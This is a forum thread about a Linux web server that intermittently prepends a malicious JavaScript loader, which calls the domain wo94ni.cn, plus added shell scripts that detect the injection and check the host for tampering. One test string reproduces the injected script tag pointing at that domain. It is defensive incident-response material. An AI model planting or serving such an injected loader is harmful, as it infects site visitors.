How to remove suspicious JavaScript prepended on files under a Linux server?
Hi, unfortunately our server www8.eonconnect.com seems to have been compromised with an exploit similar to this: http://blog.cpanel.net/?p=31
(even though it's not running cPanel, it seems similar)
For example if you run this at the commandline:
curl http://www8.eonconnect.com
you should get a blank HTML page with no JavaScript (don't visit this with a browser).
But every 10th time or so, you get a malware script inserted at the top of the page.
Whatever it is, it hides itself well. If you run the following:
curl http://www8.eonconnect.com
from the server itself, you will get nothing unusual; it seems not to activate when accessed from its own IP.
But if you run that from another machine, you will get a JavaScript prepended which loads a script from the domain wo94ni.cn. It seems to record the IP addresses accessing it, so it will usually show the first time, and then you may have to rerun the curl command 10 or 20 times to see it again; after a certain number of times it will stop showing altogether for that client IP. We had 3 people in different locations spend a couple of hours verifying this behavior yesterday.
In the article referenced, or something linked from it, I read that it somehow loads itself into memory so that it can't be detected by checking for filesystem changes? Not sure how true that is; this is beyond my area of expertise. But we're sure that something is able to intermittently add a malicious JavaScript to web pages served from the server.
I installed 2 rootkit detectors, one called Rootkit Hunter and the other chkrootkit; I'm attaching the log files in case they are helpful at all.
Linux Distributions, Linux Security, Apache Web Server
Last comment: code4design, 8/22/2022 (Mon)
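The sampling the question describes (repeated fetches from a machine other than the server, watching for a response whose page is preceded by a script element) can be scripted so that hits are kept for comparison rather than eyeballed. The following is an added example and not code from the original thread or from any tool it mentions. It assumes the clean page contains no script tag before its first html or DOCTYPE tag; the URL and the wo94ni.cn domain are from the post, while the two sample bodies and the "/x.js" path are constructed for offline testing.

```sh
#!/bin/sh
# Added example (not from the original post). Sample a site repeatedly from a
# host other than the server (the post reports the payload is never served to
# the server's own IP) and flag responses in which a <script> element precedes
# the real document, i.e. "prepended JavaScript" as it looks on the wire.
# Assumption: the clean page has no <script> before its first <html>/<!DOCTYPE>.

# is_injected: read a response body from stdin; return 0 (true) when a <script>
# tag appears before the first <html> or <!DOCTYPE> tag. A body with no <html>
# at all is treated as entirely "prefix", so any <script> in it counts.
is_injected() {
    prefix=$(tr -d '\n' | tr 'A-Z' 'a-z' | sed 's/<html.*//; s/<!doctype.*//')
    case "$prefix" in
        *"<script"*) return 0 ;;
        *) return 1 ;;
    esac
}

# injected_hosts: read a body from stdin; print the host of every absolute
# http(s) URL in it, one per line, deduplicated. Run once against a known
# clean copy of the page to get an allowlist; anything new is the loader.
injected_hosts() {
    tr -d '\n' | grep -o -i 'https\{0,1\}://[^"'"'"' >]*' | awk -F/ '{print $3}' | sort -u
}

# count_injected: how many of the bodies given as arguments are injected.
count_injected() {
    n=0
    for body in "$@"; do
        if printf '%s' "$body" | is_injected; then n=$((n + 1)); fi
    done
    echo "$n"
}

# sample_site URL [TRIES] [OUTDIR]: fetch URL TRIES times, keep every injected
# response on disk, and report the hit rate. Run it from several external
# hosts: the post reports the payload stops being served to a client IP after
# a number of hits, so one vantage point goes quiet and proves nothing.
sample_site() {
    url=$1; tries=${2:-20}; outdir=${3:-./samples}
    mkdir -p "$outdir"
    hits=0; i=0
    while [ "$i" -lt "$tries" ]; do
        i=$((i + 1))
        body=$(curl -s --max-time 15 -A 'Mozilla/5.0' "$url")
        if printf '%s' "$body" | is_injected; then
            hits=$((hits + 1))
            printf '%s\n' "$body" > "$outdir/hit-$i.html"
            echo "try $i: INJECTED; external hosts: $(printf '%s' "$body" | injected_hosts | tr '\n' ' ')"
        else
            echo "try $i: clean"
        fi
        sleep 1
    done
    echo "$hits of $tries responses carried a prepended script"
}

# Constructed sample responses: the clean page and the page with the loader
# prepended, as the post describes them. The "/x.js" path is invented.
SAMPLE_CLEAN='<html><head></head><body></body></html>'
SAMPLE_BAD='<script src="http://wo94ni.cn/x.js"></script>
<html><head></head><body></body></html>'

if [ "$#" -ge 1 ]; then
    sample_site "$@"
else
    echo "clean sample injected? $(printf '%s' "$SAMPLE_CLEAN" | is_injected && echo yes || echo no)"
    echo "bad sample injected?   $(printf '%s' "$SAMPLE_BAD" | is_injected && echo yes || echo no)"
    echo "hosts in bad sample:   $(printf '%s' "$SAMPLE_BAD" | injected_hosts | tr '\n' ' ')"
fi
```

Usage: `sh sample.sh http://www8.eonconnect.com 30 ./samples` from an external host. Saved hits give ahoffmann's request (the actual malicious output) in a form that can be diffed against the clean page and against hits from other vantage points, which tells you whether the prepended block varies per client.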
ahoffmann
Can you please post the malicious output of your curl command?
code4design
ASKER
Hi ahoffmann, thanks for replying. We are making a couple more tests. When we found this thing we started strengthening our server's ways of being accessed, and our most common way was SSH; it was using password-based authentication and I modified the config file a bit so it's now key-based. Since that moment we have run test scripts for detection of this malicious script and it is not coming up anymore. Probably our password was compromised in some way, and since they now don't have any keys they are not able to access it anymore.
I'll inform you about anything that comes up between today and tomorrow; hopefully I've closed the door to that pesky script... :P
ahoffmann
Hmm, I don't understand what SSH has to do with your web server (except that someone managed to log in and install some malware).
Yeah, it's really weird, but that has been the behavior. I'll keep you guys posted about any changes we see between today and tomorrow.
Thanks for replying!
P.S.
When I saw your reply I was about to post the response I sent to you; what I mean is that I wasn't going to forget about replying... ;)
code4design
ASKER
Hi, we haven't had any more incidents of this script up to this day, but we are thinking of an OS restore since the server was compromised from the time we were getting that script, which looked something like this anyway:
clean curl www8.eonconnect.com
with the script curl www8.eonconnect.com
Anyway, the script doesn't matter in terms of what exactly it was, since you wouldn't visit the appended link anyway.
Now, the reason I replied with this is to see if anyone has seen this before and knows exactly what it was, so you can orient me on how to verify that it is not in our servers anymore; or, if you have previous experience with this and are certain that there is a big chance that it is still inside, on how to look for it and how to remove it. All of this is to see if we can avoid the OS restore, which would be a big job for us in terms of customizations.
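On the asker's question of how to verify the server is clean short of an OS restore: the on-disk checks a responder would ask for are the served files themselves, recent filesystem changes, library preload hooks, package integrity of the web server, and the list of loaded Apache modules. The script below is an added example and not code from the thread or from Rootkit Hunter or chkrootkit; the loader domain is from the question, the web root and module paths are assumptions to adjust, and the files the usage note creates are constructed. One caveat a practitioner would add: if the implant lives in the kernel or only inside the running httpd, as the asker's reading of the cPanel article suggests, every tool below can be lied to, and only a rebuild from known-good media is conclusive.

```sh
#!/bin/sh
# Added example (not from the original thread). Host-side checks for a server
# that intermittently serves a prepended <script>. Paths are assumptions.

# scan_webroot DIR: print each .html/.htm/.php file under DIR whose leading
# bytes carry a <script> or <iframe> before the document really starts
# (<html>, <!DOCTYPE> or <?php), or that references the loader domain named in
# the question anywhere in the file. A legitimate <script> inside <head> is
# not flagged, because it comes after <html>.
scan_webroot() {
    find "$1" -type f \( -name '*.html' -o -name '*.htm' -o -name '*.php' \) |
    while read -r f; do
        lead=$(head -c 512 "$f" | tr -d '\n' | tr 'A-Z' 'a-z' |
               sed 's/<html.*//; s/<!doctype.*//; s/<?php.*//')
        case "$lead" in
            *"<script"*|*"<iframe"*) echo "$f" ;;
            *) if grep -qi 'wo94ni\.cn' "$f"; then echo "$f"; fi ;;
        esac
    done
}

# recent_changes DIR DAYS: every regular file under DIR modified within the
# last DAYS days. Worth running over the web root, /etc, the Apache module
# directory (/usr/lib*/apache2 or /usr/lib*/httpd, distro dependent) and
# /lib/modules, then explaining every entry.
recent_changes() {
    find "$1" -type f -mtime -"$2"
}

# host_checks: preload hooks, package integrity of the web server and the
# modules httpd actually loaded. Each tool runs only if this distro has it.
host_checks() {
    if [ -s /etc/ld.so.preload ]; then
        echo "WARNING: /etc/ld.so.preload is non-empty (library preload hook):"
        cat /etc/ld.so.preload
    fi
    if [ -n "$LD_PRELOAD" ]; then
        echo "WARNING: LD_PRELOAD is set in this environment: $LD_PRELOAD"
    fi
    # rpm -Va marks a changed file digest with '5' in column 3 of the flags
    if command -v rpm >/dev/null 2>&1; then
        echo "rpm: httpd/apache files whose digest no longer matches the package:"
        rpm -Va 2>/dev/null | awk 'substr($1,3,1)=="5"' | grep -Ei 'httpd|apache'
    fi
    if command -v debsums >/dev/null 2>&1; then
        echo "debsums: changed files in apache packages:"
        debsums -c 2>/dev/null | grep -Ei 'apache'
    fi
    echo "loaded Apache modules (compare against the module directory and package list):"
    apachectl -M 2>/dev/null || apache2ctl -M 2>/dev/null || httpd -M 2>/dev/null
}

if [ "$#" -ge 1 ]; then
    echo "== files with a prepended script/iframe or a loader reference under $1 =="
    scan_webroot "$1"
    echo "== files under $1 modified in the last ${2:-7} days =="
    recent_changes "$1" "${2:-7}"
    echo "== host checks =="
    host_checks
else
    echo "usage: $0 WEBROOT [DAYS]" >&2
fi
```

Run as root with the web root as the first argument, e.g. `sh verify.sh /var/www 14`. An empty result from scan_webroot together with the injection still appearing from outside (as the question describes) is itself a finding: it means the script is added at serving time rather than stored in the files, which points at httpd, its modules or something beneath them rather than at the content.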